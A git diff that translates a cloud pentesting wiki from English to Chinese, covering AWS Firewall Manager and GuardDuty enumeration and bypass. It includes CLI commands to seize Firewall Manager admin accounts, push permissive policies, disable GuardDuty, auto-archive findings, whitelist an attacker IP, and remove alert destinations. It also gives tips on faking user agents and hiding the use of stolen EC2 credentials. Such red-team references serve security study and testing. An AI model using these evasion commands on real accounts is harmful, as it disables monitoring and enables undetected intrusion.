Firewall (NGFW) protections and rulestacks to your organization's VPCs, providing advanced threat prevention and application-level security controls. - 2. **Fortigate Cloud Native Firewall (CNF) as a Service Policy:** This policy applies Fortigate Cloud Native Firewall (CNF) as a Service protections, offering industry-leading threat prevention, web application firewall (WAF), and API protection tailored for cloud infrastructures. +1. **AWS WAF 策略**:此策略类型支持 AWS WAF 和 AWS WAF Classic。您可以定义哪些资源受到该策略的保护。对于 AWS WAF 策略,您可以指定要首先和最后运行的规则组集合。此外,账户所有者可以添加在这些集合之间运行的规则和规则组。 +2. **Shield Advanced 策略**:此策略在您的组织中对指定资源类型应用 Shield Advanced 保护。它有助于防范 DDoS 攻击和其他威胁。 +3. **Amazon VPC 安全组策略**:通过此策略,您可以管理在整个组织中使用的安全组,在您的 AWS 环境中强制执行一组基线规则以控制网络访问。 +4. **Amazon VPC 网络访问控制列表 (ACL) 策略**:此策略类型使您能够控制在组织中使用的网络 ACL,允许您在 AWS 环境中强制执行一组基线网络 ACL。 +5. **网络防火墙策略**:此策略将 AWS 网络防火墙保护应用于您组织的 VPC,增强网络安全,通过预定义规则过滤流量。 +6. **Amazon Route 53 解析器 DNS 防火墙策略**:此策略将 DNS 防火墙保护应用于您组织的 VPC,帮助阻止恶意域名解析尝试并强制执行 DNS 流量的安全策略。 +7. **第三方防火墙策略**:此策略类型应用来自第三方防火墙的保护,这些防火墙通过 AWS Marketplace 控制台提供订阅。它允许您将来自受信任供应商的额外安全措施集成到您的 AWS 环境中。 +1. **Palo Alto Networks Cloud NGFW 策略**:此策略将 Palo Alto Networks Cloud 下一代防火墙 (NGFW) 保护和规则堆栈应用于您组织的 VPC,提供高级威胁防护和应用级安全控制。 +2. **Fortigate Cloud Native Firewall (CNF) 作为服务策略**:此策略应用 Fortigate Cloud Native Firewall (CNF) 作为服务的保护,提供行业领先的威胁防护、Web 应用防火墙 (WAF) 和针对云基础设施的 API 保护。 ### Administrator accounts -AWS Firewall Manager offers flexibility in managing firewall resources within your organization through its administrative scope and two types of administrator accounts. +AWS Firewall Manager 通过其管理范围和两种类型的管理员账户提供灵活性,以管理您组织内的防火墙资源。 -**Administrative scope defines the resources that a Firewall Manager administrator can manage**. After an AWS Organizations management account onboards an organization to Firewall Manager, it can create additional administrators with different administrative scopes. These scopes can include: +**管理范围定义了 Firewall Manager 管理员可以管理的资源**。在 AWS Organizations 管理账户将组织引入 Firewall Manager 后,它可以创建具有不同管理范围的其他管理员。这些范围可以包括: -- Accounts or organizational units (OUs) that the administrator can apply policies to. -- Regions where the administrator can perform actions. -- Firewall Manager policy types that the administrator can manage. +- 管理员可以应用政策的账户或组织单位 (OU)。 +- 管理员可以执行操作的区域。 +- 管理员可以管理的 Firewall Manager 策略类型。 -Administrative scope can be either **full or restricted**. Full scope grants the administrator access to **all specified resource types, regions, and policy types**. In contrast, **restricted scope provides administrative permission to only a subset of resources, regions, or policy types**. It's advisable to grant administrators only the permissions they need to fulfill their roles effectively. You can apply any combination of these administrative scope conditions to an administrator, ensuring adherence to the principle of least privilege. +管理范围可以是 **完全或受限**。完全范围授予管理员对 **所有指定资源类型、区域和策略类型** 的访问权限。相反,**受限范围仅提供对资源、区域或策略类型的子集的管理权限**。建议仅授予管理员完成其角色所需的权限。您可以将这些管理范围条件的任意组合应用于管理员,以确保遵循最小权限原则。 -There are two distinct types of administrator accounts, each serving specific roles and responsibilities: +有两种不同类型的管理员账户,每种账户都有特定的角色和责任: -- **Default Administrator:** - - The default administrator account is created by the AWS Organizations organization's management account during the onboarding process to Firewall Manager. - - This account has the capability to manage third-party firewalls and possesses full administrative scope. - - It serves as the primary administrator account for Firewall Manager, responsible for configuring and enforcing security policies across the organization. - - While the default administrator has full access to all resource types and administrative functionalities, it operates at the same peer level as other administrators if multiple administrators are utilized within the organization. -- **Firewall Manager Administrators:** - - These administrators can manage resources within the scope designated by the AWS Organizations management account, as defined by the administrative scope configuration. - - Firewall Manager administrators are created to fulfill specific roles within the organization, allowing for delegation of responsibilities while maintaining security and compliance standards. - - Upon creation, Firewall Manager checks with AWS Organizations to determine if the account is already a delegated administrator. If not, Firewall Manager calls Organizations to designate the account as a delegated administrator for Firewall Manager. +- **默认管理员**: +- 默认管理员账户由 AWS Organizations 组织的管理账户在引入 Firewall Manager 过程中创建。 +- 该账户能够管理第三方防火墙,并拥有完全的管理范围。 +- 它作为 Firewall Manager 的主要管理员账户,负责在组织内配置和强制执行安全策略。 +- 虽然默认管理员对所有资源类型和管理功能具有完全访问权限,但如果在组织内使用多个管理员,它与其他管理员处于同一对等级别。 +- **Firewall Manager 管理员**: +- 这些管理员可以在 AWS Organizations 管理账户指定的范围内管理资源,如管理范围配置所定义的那样。 +- Firewall Manager 管理员是为了在组织内履行特定角色而创建的,允许在保持安全和合规标准的同时进行责任的委派。 +- 创建后,Firewall Manager 会与 AWS Organizations 检查该账户是否已经是委派管理员。如果不是,Firewall Manager 会调用 Organizations 将该账户指定为 Firewall Manager 的委派管理员。 -Managing these administrator accounts involves creating them within Firewall Manager and defining their administrative scopes according to the organization's security requirements and the principle of least privilege. By assigning appropriate administrative roles, organizations can ensure effective security management while maintaining granular control over access to sensitive resources. +管理这些管理员账户涉及在 Firewall Manager 中创建它们,并根据组织的安全要求和最小权限原则定义其管理范围。通过分配适当的管理角色,组织可以确保有效的安全管理,同时保持对敏感资源访问的细粒度控制。 -It is important to highlight that **only one account within an organization can serve as the Firewall Manager default administrator**, adhering to the principle of "**first in, last out**". To designate a new default administrator, a series of steps must be followed: +重要的是要强调,**在一个组织内只能有一个账户作为 Firewall Manager 默认管理员**,遵循“**先入后出**”原则。要指定新的默认管理员,必须遵循一系列步骤: -- First, each Firewall Administrator administrator account must revoke their own account. -- Then, the existing default administrator can revoke their own account, effectively offboarding the organization from Firewall Manager. This process results in the deletion of all Firewall Manager policies created by the revoked account. -- To conclude, the AWS Organizations management account must designate the Firewall Manager dafault administrator. +- 首先,每个 Firewall Administrator 管理员账户必须撤销自己的账户。 +- 然后,现有的默认管理员可以撤销自己的账户,有效地将组织从 Firewall Manager 中移除。此过程将导致撤销账户创建的所有 Firewall Manager 策略被删除。 +- 最后,AWS Organizations 管理账户必须指定 Firewall Manager 默认管理员。 ## Enumeration - ``` # Users/Administrators @@ -162,66 +161,58 @@ aws fms get-third-party-firewall-association-status --third-party-firewall --member-account --resource-id --resource-type ``` - ## Post Exploitation / Bypass Detection ### `organizations:DescribeOrganization` & (`fms:AssociateAdminAccount`, `fms:DisassociateAdminAccount`, `fms:PutAdminAccount`) -An attacker with the **`fms:AssociateAdminAccount`** permission would be able to set the Firewall Manager default administrator account. With the **`fms:PutAdminAccount`** permission, an attacker would be able to create or updatea Firewall Manager administrator account and with the **`fms:DisassociateAdminAccount`** permission, a potential attacker could remove the current Firewall Manager administrator account association. - -- The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account. -- In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**. -- The creation of a Firewall Manager administrator account can only be done by the organization's management account. +拥有 **`fms:AssociateAdminAccount`** 权限的攻击者将能够设置防火墙管理器默认管理员账户。拥有 **`fms:PutAdminAccount`** 权限的攻击者将能够创建或更新防火墙管理器管理员账户,而拥有 **`fms:DisassociateAdminAccount`** 权限的潜在攻击者可以移除当前的防火墙管理器管理员账户关联。 +- **防火墙管理器默认管理员的解除关联遵循先进后出政策**。所有防火墙管理器管理员必须解除关联,才能让防火墙管理器默认管理员解除账户关联。 +- 要通过 **PutAdminAccount** 创建防火墙管理器管理员,账户必须属于之前通过 **AssociateAdminAccount** 加入防火墙管理器的组织。 +- 防火墙管理器管理员账户的创建只能由组织的管理账户完成。 ```bash aws fms associate-admin-account --admin-account aws fms disassociate-admin-account aws fms put-admin-account --admin-account ``` - -**Potential Impact:** Loss of centralized management, policy evasion, compliance violations, and disruption of security controls within the environment. +**潜在影响:** 中心化管理的丧失、策略规避、合规性违规以及环境中安全控制的中断。 ### `fms:PutPolicy`, `fms:DeletePolicy` -An attacker with the **`fms:PutPolicy`**, **`fms:DeletePolicy`** permissions would be able to create, modify or permanently delete an AWS Firewall Manager policy. - +拥有 **`fms:PutPolicy`**、**`fms:DeletePolicy`** 权限的攻击者将能够创建、修改或永久删除 AWS Firewall Manager 策略。 ```bash aws fms put-policy --policy | --cli-input-json file:// [--tag-list ] aws fms delete-policy --policy-id [--delete-all-policy-resources | --no-delete-all-policy-resources] ``` - -An example of permisive policy through permisive security group, in order to bypass the detection, could be the following one: - +一个通过宽松安全组的宽松策略示例,为了绕过检测,可以是以下内容: ```json { - "Policy": { - "PolicyName": "permisive_policy", - "SecurityServicePolicyData": { - "Type": "SECURITY_GROUPS_COMMON", - "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}" - }, - "ResourceTypeList": [ - "AWS::EC2::Instance", - "AWS::EC2::NetworkInterface", - "AWS::EC2::SecurityGroup", - "AWS::ElasticLoadBalancingV2::LoadBalancer", - "AWS::ElasticLoadBalancing::LoadBalancer" - ], - "ResourceType": "AWS::EC2::SecurityGroup", - "ExcludeResourceTags": false, - "ResourceTags": [], - "RemediationEnabled": true - }, - "TagList": [] +"Policy": { +"PolicyName": "permisive_policy", +"SecurityServicePolicyData": { +"Type": "SECURITY_GROUPS_COMMON", +"ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}" +}, +"ResourceTypeList": [ +"AWS::EC2::Instance", +"AWS::EC2::NetworkInterface", +"AWS::EC2::SecurityGroup", +"AWS::ElasticLoadBalancingV2::LoadBalancer", +"AWS::ElasticLoadBalancing::LoadBalancer" +], +"ResourceType": "AWS::EC2::SecurityGroup", +"ExcludeResourceTags": false, +"ResourceTags": [], +"RemediationEnabled": true +}, +"TagList": [] } ``` - -**Potential Impact:** Dismantling of security controls, policy evasion, compliance violations, operational disruptions, and potential data breaches within the environment. +**潜在影响:** 安全控制的拆解、政策规避、合规性违规、操作中断,以及环境中潜在的数据泄露。 ### `fms:BatchAssociateResource`, `fms:BatchDisassociateResource`, `fms:PutResourceSet`, `fms:DeleteResourceSet` -An attacker with the **`fms:BatchAssociateResource`** and **`fms:BatchDisassociateResource`** permissions would be able to associate or disassociate resources from a Firewall Manager resource set respectively. In addition, the **`fms:PutResourceSet`** and **`fms:DeleteResourceSet`** permissions would allow an attacker to create, modify or delete these resource sets from AWS Firewall Manager. - +拥有 **`fms:BatchAssociateResource`** 和 **`fms:BatchDisassociateResource`** 权限的攻击者将能够分别将资源关联或取消关联到防火墙管理器资源集。此外,**`fms:PutResourceSet`** 和 **`fms:DeleteResourceSet`** 权限将允许攻击者创建、修改或删除这些资源集。 ```bash # Associate/Disassociate resources from a resource set aws fms batch-associate-resource --resource-set-identifier --items @@ -231,83 +222,68 @@ aws fms batch-disassociate-resource --resource-set-identifier --items [--tag-list ] aws fms delete-resource-set --identifier ``` - -**Potential Impact:** The addition of an unnecessary amount of items to a resource set will increase the level of noise in the Service potentially causing a DoS. In addition, changes of the resource sets could lead to a resource disruption, policy evasion, compliance violations, and disruption of security controls within the environment. +**潜在影响:** 向资源集添加不必要的项目将增加服务中的噪音水平,可能导致DoS。此外,资源集的变化可能导致资源中断、策略规避、合规性违规以及环境中安全控制的中断。 ### `fms:PutAppsList`, `fms:DeleteAppsList` -An attacker with the **`fms:PutAppsList`** and **`fms:DeleteAppsList`** permissions would be able to create, modify or delete application lists from AWS Firewall Manager. This could be critical, as unauthorized applications could be allowed access to the general public, or access to authorized applications could be denied, causing a DoS. - +拥有**`fms:PutAppsList`**和**`fms:DeleteAppsList`**权限的攻击者将能够创建、修改或删除AWS Firewall Manager中的应用程序列表。这可能是关键的,因为未经授权的应用程序可能被允许访问公众,或者对授权应用程序的访问可能被拒绝,从而导致DoS。 ```bash aws fms put-apps-list --apps-list [--tag-list ] aws fms delete-apps-list --list-id ``` - -**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment. +**潜在影响:** 这可能导致配置错误、政策规避、合规性违规以及环境中安全控制的中断。 ### `fms:PutProtocolsList`, `fms:DeleteProtocolsList` -An attacker with the **`fms:PutProtocolsList`** and **`fms:DeleteProtocolsList`** permissions would be able to create, modify or delete protocols lists from AWS Firewall Manager. Similarly as with applications lists, this could be critical since unauthorized protocols could be used by the general public, or the use of authorized protocols could be denied, causing a DoS. - +拥有 **`fms:PutProtocolsList`** 和 **`fms:DeleteProtocolsList`** 权限的攻击者将能够从 AWS Firewall Manager 创建、修改或删除协议列表。与应用程序列表类似,这可能是关键的,因为未经授权的协议可能被公众使用,或者授权协议的使用可能被拒绝,从而导致 DoS。 ```bash aws fms put-protocols-list --apps-list [--tag-list ] aws fms delete-protocols-list --list-id ``` - -**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment. +**潜在影响:** 这可能导致配置错误、策略规避、合规性违规以及环境中安全控制的中断。 ### `fms:PutNotificationChannel`, `fms:DeleteNotificationChannel` -An attacker with the **`fms:PutNotificationChannel`** and **`fms:DeleteNotificationChannel`** permissions would be able to delete and designate the IAM role and Amazon Simple Notification Service (SNS) topic that Firewall Manager uses to record SNS logs. +拥有 **`fms:PutNotificationChannel`** 和 **`fms:DeleteNotificationChannel`** 权限的攻击者将能够删除和指定 Firewall Manager 用于记录 SNS 日志的 IAM 角色和 Amazon Simple Notification Service (SNS) 主题。 -To use **`fms:PutNotificationChannel`** outside of the console, you need to set up the SNS topic's access policy, allowing the specified **SnsRoleName** to publish SNS logs. If the provided **SnsRoleName** is a role other than the **`AWSServiceRoleForFMS`**, it requires a trust relationship configured to permit the Firewall Manager service principal **fms.amazonaws.com** to assume this role. +要在控制台外使用 **`fms:PutNotificationChannel`**,您需要设置 SNS 主题的访问策略,允许指定的 **SnsRoleName** 发布 SNS 日志。如果提供的 **SnsRoleName** 是除 **`AWSServiceRoleForFMS`** 之外的角色,则需要配置信任关系,以允许 Firewall Manager 服务主体 **fms.amazonaws.com** 假设该角色。 -For information about configuring an SNS access policy: +有关配置 SNS 访问策略的信息: {{#ref}} ../aws-sns-enum.md {{#endref}} - ```bash aws fms put-notification-channel --sns-topic-arn --sns-role-name aws fms delete-notification-channel ``` - -**Potential Impact:** This would potentially lead to miss security alerts, delayed incident response, potential data breaches and operational disruptions within the environment. +**潜在影响:** 这可能导致错过安全警报、延迟事件响应、潜在的数据泄露和环境内的操作中断。 ### `fms:AssociateThirdPartyFirewall`, `fms:DisssociateThirdPartyFirewall` -An attacker with the **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** permissions would be able to associate or disassociate third-party firewalls from being managed centrally through AWS Firewall Manager. +拥有 **`fms:AssociateThirdPartyFirewall`**、**`fms:DisssociateThirdPartyFirewall`** 权限的攻击者将能够将第三方防火墙关联或取消关联,以便通过 AWS Firewall Manager 进行集中管理。 > [!WARNING] -> Only the default administrator can create and manage third-party firewalls. - +> 只有默认管理员可以创建和管理第三方防火墙。 ```bash aws fms associate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL] aws fms disassociate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL] ``` - -**Potential Impact:** The disassociation would lead to a policy evasion, compliance violations, and disruption of security controls within the environment. The association on the other hand would lead to a disruption of cost and budget allocation. +**潜在影响:** 解除关联将导致政策规避、合规性违规以及环境内安全控制的中断。另一方面,关联将导致成本和预算分配的中断。 ### `fms:TagResource`, `fms:UntagResource` -An attacker would be able to add, modify, or remove tags from Firewall Manager resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - +攻击者将能够添加、修改或删除防火墙管理器资源的标签,从而干扰您组织的成本分配、资源跟踪和基于标签的访问控制政策。 ```bash aws fms tag-resource --resource-arn --tag-list aws fms untag-resource --resource-arn --tag-keys ``` +**潜在影响**:成本分配、资源跟踪和基于标签的访问控制策略的中断。 -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. - -## References +## 参考文献 - [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html) - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html) - [https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md index 2794852d3..4aaa68809 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md @@ -4,64 +4,63 @@ ## GuardDuty -According to the [**docs**](https://aws.amazon.com/guardduty/features/): GuardDuty combines **machine learning, anomaly detection, network monitoring, and malicious file discovery**, using both AWS and industry-leading third-party sources to help protect workloads and data on AWS. GuardDuty is capable of analysing tens of billions of events across multiple AWS data sources, such as AWS CloudTrail event logs, Amazon Virtual Private Cloud (VPC) Flow Logs, Amazon Elastic Kubernetes Service (EKS) audit and system-level logs, and DNS query logs. +根据[**文档**](https://aws.amazon.com/guardduty/features/): GuardDuty结合了**机器学习、异常检测、网络监控和恶意文件发现**,利用AWS和行业领先的第三方来源来帮助保护AWS上的工作负载和数据。GuardDuty能够分析数十亿个事件,跨多个AWS数据源,如AWS CloudTrail事件日志、Amazon虚拟私有云(VPC)流日志、Amazon弹性Kubernetes服务(EKS)审计和系统级日志,以及DNS查询日志。 -Amazon GuardDuty **identifies unusual activity within your accounts**, analyses the **security relevanc**e of the activity, and gives the **context** in which it was invoked. This allows a responder to determine if they should spend time on further investigation. +Amazon GuardDuty **识别您账户内的异常活动**,分析该活动的**安全相关性**,并提供其被调用的**上下文**。这使得响应者能够判断是否应该花时间进行进一步调查。 -Alerts **appear in the GuardDuty console (90 days)** and CloudWatch Events. +警报**出现在GuardDuty控制台(90天)**和CloudWatch事件中。 > [!WARNING] -> When a user **disable GuardDuty**, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the **existing findings will be lost**.\ -> If you just stop it, the existing findings will remain. +> 当用户**禁用GuardDuty**时,它将停止监控您的AWS环境,并且不会生成任何新的发现,**现有发现将丢失**。\ +> 如果您只是停止它,现有发现将保留。 -### Findings Example +### 发现示例 -- **Reconnaissance**: Activity suggesting reconnaissance by an attacker, such as **unusual API activity**, suspicious database **login** attempts, intra-VPC **port scanning**, unusual failed login request patterns, or unblocked port probing from a known bad IP. -- **Instance compromise**: Activity indicating an instance compromise, such as **cryptocurrency mining, backdoor command and control (C\&C)** activity, malware using domain generation algorithms (DGA), outbound denial of service activity, unusually **high network** traffic volume, unusual network protocols, outbound instance communication with a known malicious IP, temporary Amazon EC2 credentials used by an external IP address, and data exfiltration using DNS. -- **Account compromise**: Common patterns indicative of account compromise include API calls from an unusual geolocation or anonymizing proxy, attempts to disable AWS CloudTrail logging, changes that weaken the account password policy, unusual instance or infrastructure launches, infrastructure deployments in an unusual region, credential theft, suspicious database login activity, and API calls from known malicious IP addresses. -- **Bucket compromise**: Activity indicating a bucket compromise, such as suspicious data access patterns indicating credential misuse, unusual Amazon S3 API activity from a remote host, unauthorized S3 access from known malicious IP addresses, and API calls to retrieve data in S3 buckets from a user with no prior history of accessing the bucket or invoked from an unusual location. Amazon GuardDuty continuously monitors and analyzes AWS CloudTrail S3 data events (e.g. GetObject, ListObjects, DeleteObject) to detect suspicious activity across all of your Amazon S3 buckets. +- **侦察**: 表示攻击者进行侦察的活动,例如**异常API活动**、可疑的数据库**登录**尝试、VPC内**端口扫描**、异常的失败登录请求模式,或来自已知恶意IP的未阻止端口探测。 +- **实例被攻破**: 表示实例被攻破的活动,例如**加密货币挖矿、后门命令与控制(C\&C)**活动、使用域生成算法(DGA)的恶意软件、出站拒绝服务活动、异常的**高网络**流量、异常的网络协议、与已知恶意IP的出站实例通信、外部IP地址使用的临时Amazon EC2凭证,以及使用DNS的数据外泄。 +- **账户被攻破**: 表示账户被攻破的常见模式包括来自异常地理位置或匿名代理的API调用、尝试禁用AWS CloudTrail日志、削弱账户密码策略的更改、异常的实例或基础设施启动、在异常区域的基础设施部署、凭证盗窃、可疑的数据库登录活动,以及来自已知恶意IP地址的API调用。 +- **存储桶被攻破**: 表示存储桶被攻破的活动,例如可疑的数据访问模式表明凭证被滥用、来自远程主机的异常Amazon S3 API活动、来自已知恶意IP地址的未授权S3访问,以及从没有先前访问存储桶历史的用户或从异常位置调用的API获取S3存储桶中的数据。Amazon GuardDuty持续监控和分析AWS CloudTrail S3数据事件(例如GetObject、ListObjects、DeleteObject),以检测您所有Amazon S3存储桶中的可疑活动。
-Finding Information +发现信息 -Finding summary: +发现摘要: -- Finding type -- Severity: 7-8.9 High, 4-6.9 Medium, 01-3.9 Low -- Region -- Account ID -- Resource ID -- Time of detection -- Which threat list was used +- 发现类型 +- 严重性:7-8.9 高,4-6.9 中,01-3.9 低 +- 区域 +- 账户ID +- 资源ID +- 检测时间 +- 使用了哪个威胁列表 -The body has this information: +主体包含以下信息: -- Resource affected -- Action -- Actor: Ip address, port and domain -- Additional Information +- 受影响的资源 +- 操作 +- 行为者:IP地址、端口和域 +- 额外信息
-### All Findings +### 所有发现 -Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) +访问所有GuardDuty发现的列表: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) -### Multi Accounts +### 多账户 -#### By Invitation +#### 通过邀请 -You can **invite other accounts** to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation. +您可以**邀请其他账户**到不同的AWS GuardDuty账户,以便**每个账户都从同一个GuardDuty进行监控**。主账户必须邀请成员账户,然后成员账户的代表必须接受邀请。 -#### Via Organization +#### 通过组织 -You can designate any account within the organization to be the **GuardDuty delegated administrator**. Only the organization management account can designate a delegated administrator. +您可以指定组织内的任何账户为**GuardDuty委派管理员**。只有组织管理账户可以指定委派管理员。 -An account that gets designated as a delegated administrator becomes a GuardDuty administrator account, has GuardDuty enabled automatically in the designated AWS Region, and also has the **permission to enable and manage GuardDuty for all of the accounts in the organization within that Region**. The other accounts in the organization can be viewed and added as GuardDuty member accounts associated with this delegated administrator account. - -## Enumeration +被指定为委派管理员的账户成为GuardDuty管理员账户,在指定的AWS区域自动启用GuardDuty,并且还**有权限在该区域内为组织中的所有账户启用和管理GuardDuty**。组织中的其他账户可以被视为与此委派管理员账户关联的GuardDuty成员账户。 +## 枚举 ```bash # Get Org config aws guardduty list-organization-admin-accounts #Get Delegated Administrator @@ -101,85 +100,76 @@ aws guardduty list-publishing-destinations --detector-id aws guardduty list-threat-intel-sets --detector-id aws guardduty get-threat-intel-set --detector-id --threat-intel-set-id ``` - ## GuardDuty Bypass ### General Guidance -Try to find out as much as possible about the behaviour of the credentials you are going to use: +尽量多了解你将要使用的凭证的行为: -- Times it's used -- Locations -- User Agents / Services (It could be used from awscli, webconsole, lambda...) -- Permissions regularly used +- 使用时间 +- 位置 +- 用户代理 / 服务(可以通过awscli、webconsole、lambda等使用) +- 定期使用的权限 -With this information, recreate as much as possible the same scenario to use the access: +根据这些信息,尽可能重现相同的场景以使用访问权限: -- If it's a **user or a role accessed by a user**, try to use it in the same hours, from the same geolocation (even the same ISP and IP if possible) -- If it's a **role used by a service**, create the same service in the same region and use it from there in the same time ranges -- Always try to use the **same permissions** this principal has used -- If you need to **use other permissions or abuse a permission** (for example, download 1.000.000 cloudtrail log files) do it **slowly** and with the **minimum amount of interactions** with AWS (awscli sometime call several read APIs before the write one) +- 如果是**用户或用户访问的角色**,尽量在相同的时间、相同的地理位置(如果可能,甚至相同的ISP和IP)使用它 +- 如果是**服务使用的角色**,在相同的区域创建相同的服务,并在相同的时间范围内从那里使用 +- 始终尝试使用该主体使用的**相同权限** +- 如果需要**使用其他权限或滥用权限**(例如,下载1.000.000个cloudtrail日志文件),请**缓慢**进行,并与AWS的**最小交互量**(awscli有时在写入之前会调用多个读取API) ### Breaking GuardDuty #### `guardduty:UpdateDetector` -With this permission you could disable GuardDuty to avoid triggering alerts. - +使用此权限可以禁用GuardDuty,以避免触发警报。 ```bash aws guardduty update-detector --detector-id --no-enable aws guardduty update-detector --detector-id --data-sources S3Logs={Enable=false} ``` - #### `guardduty:CreateFilter` -Attackers with this permission have the capability to **employ filters for the automatic** archiving of findings: - +拥有此权限的攻击者能够**使用过滤器自动**归档发现: ```bash aws guardduty create-filter --detector-id --name --finding-criteria file:///tmp/criteria.json --action ARCHIVE ``` - #### `iam:PutRolePolicy`, (`guardduty:CreateIPSet`|`guardduty:UpdateIPSet`) -Attackers with the previous privileges could modify GuardDuty's [**Trusted IP list**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) by adding their IP address to it and avoid generating alerts. - +具有先前权限的攻击者可以通过将其 IP 地址添加到 GuardDuty 的 [**受信任的 IP 列表**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) 中来修改该列表,从而避免生成警报。 ```bash aws guardduty update-ip-set --detector-id --activate --ip-set-id --location https://some-bucket.s3-eu-west-1.amazonaws.com/attacker.csv ``` - #### `guardduty:DeletePublishingDestination` -Attackers could remove the destination to prevent alerting: - +攻击者可以删除目标以防止警报: ```bash aws guardduty delete-publishing-destination --detector-id --destination-id ``` - > [!CAUTION] -> Deleting this publishing destination will **not affect the generation or visibility of findings within the GuardDuty console**. GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings. +> 删除此发布目标将**不会影响GuardDuty控制台中发现的生成或可见性**。GuardDuty将继续分析您AWS环境中的事件,识别可疑或意外行为,并生成发现。 -### Specific Findings Bypass Examples +### 特定发现绕过示例 -Note that there are tens of GuardDuty findings, however, **as Red Teamer not all of them will affect you**, and what is better, you have the f**ull documentation of each of them** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so take a look before doing any action to not get caught. +请注意,GuardDuty有数十种发现,然而,**作为红队成员,并非所有发现都会影响您**,更好的是,您可以在[https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)中找到**每个发现的完整文档**,因此在采取任何行动之前请查看,以免被抓。 -Here you have a couple of examples of specific GuardDuty findings bypasses: +以下是几个特定GuardDuty发现绕过的示例: #### [PenTest:IAMUser/KaliLinux](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux) -GuardDuty detect AWS API requests from common penetration testing tools and trigger a [PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux).\ -It's detected by the **user agent name** that is passed in the API request.\ -Therefore, **modifying the user agent** it's possible to prevent GuardDuty from detecting the attack. +GuardDuty检测来自常见渗透测试工具的AWS API请求,并触发[PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux)。\ +它是通过在API请求中传递的**用户代理名称**检测到的。\ +因此,**修改用户代理**可以防止GuardDuty检测到攻击。 -To prevent this you can search from the script `session.py` in the `botocore` package and modify the user agent, or set Burp Suite as the AWS CLI proxy and change the user-agent with the MitM or just use an OS like Ubuntu, Mac or Windows will prevent this alert from triggering. +为防止这种情况,您可以在`botocore`包中的脚本`session.py`中搜索并修改用户代理,或将Burp Suite设置为AWS CLI代理,并使用MitM更改用户代理,或者仅使用Ubuntu、Mac或Windows等操作系统将防止此警报触发。 #### UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration -Extracting EC2 credentials from the metadata service and **utilizing them outside** the AWS environment activates the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) alert. Conversely, employing these credentials from your EC2 instance triggers the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) alert. Yet, **using the credentials on another compromised EC2 instance within the same account goes undetected**, raising no alert. 